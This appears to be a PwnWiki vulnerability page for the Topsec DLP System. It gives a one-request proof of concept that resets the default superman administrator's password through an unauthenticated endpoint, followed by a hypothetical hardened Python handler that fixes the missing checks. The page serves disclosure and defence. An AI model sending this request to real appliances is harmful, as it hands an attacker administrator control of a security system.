Topsec Data Leakage Prevention System: Unauthorized Administrator Password Modification Vulnerability

From PwnWiki
Revision as of 18:19, 15 April 2021 by Pwnwiki

POC

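No login is required. The password-change function does not verify the original password, and the /?module=auth_user&action=mod_edit_pwd endpoint is accessible without authorization, so the password of any user can be changed directly. The default superman account has uid 1.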

POST /?module=auth_user&action=mod_edit_pwd 
Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
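
The two missing checks described above (no authorization on the endpoint, no verification of the original password), shown as a hardened password-change handler. This is an added example, not the vendor's code or code from the original page; the function names, in-memory stores and status codes are hypothetical, and the caller's identity is assumed to come from a server-side session rather than a client-set cookie such as `username=superman`.

```python
import hashlib
import hmac
import os
import secrets

# Constructed in-memory stores standing in for a user database and session table.
USERS = {}     # uid -> {"name", "salt", "hash"}
SESSIONS = {}  # opaque token -> uid; entries are created only by login()


def derive(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def add_user(uid, name, password):
    salt = os.urandom(16)
    USERS[uid] = {"name": name, "salt": salt, "hash": derive(password, salt)}


def login(name, password):
    for uid, user in USERS.items():
        if user["name"] == name and hmac.compare_digest(
                user["hash"], derive(password, user["salt"])):
            token = secrets.token_urlsafe(32)
            SESSIONS[token] = uid
            return token
    return None


def change_password(session_token, target_uid, old_password, new_password):
    """Return (status, reason). Hypothetical handler for a password-change request."""
    # Check 1: the caller must hold a session the server issued after login.
    caller_uid = SESSIONS.get(session_token)
    if caller_uid is None:
        return 401, "no valid server-side session"
    # Check 2: the uid in the request body must be the session owner's uid.
    if target_uid != caller_uid:
        return 403, "uid does not match session owner"
    # Check 3: the original password must be proven before it is replaced.
    user = USERS[caller_uid]
    if not hmac.compare_digest(user["hash"], derive(old_password or "", user["salt"])):
        return 403, "current password incorrect"
    user["salt"] = os.urandom(16)
    user["hash"] = derive(new_password, user["salt"])
    # Drop every session of this user so old tokens stop working.
    for token in [t for t, u in SESSIONS.items() if u == caller_uid]:
        del SESSIONS[token]
    return 200, "password changed"
```

A request shaped like the one above (no session, no original password, `uid=1` in the body) is rejected at the first check.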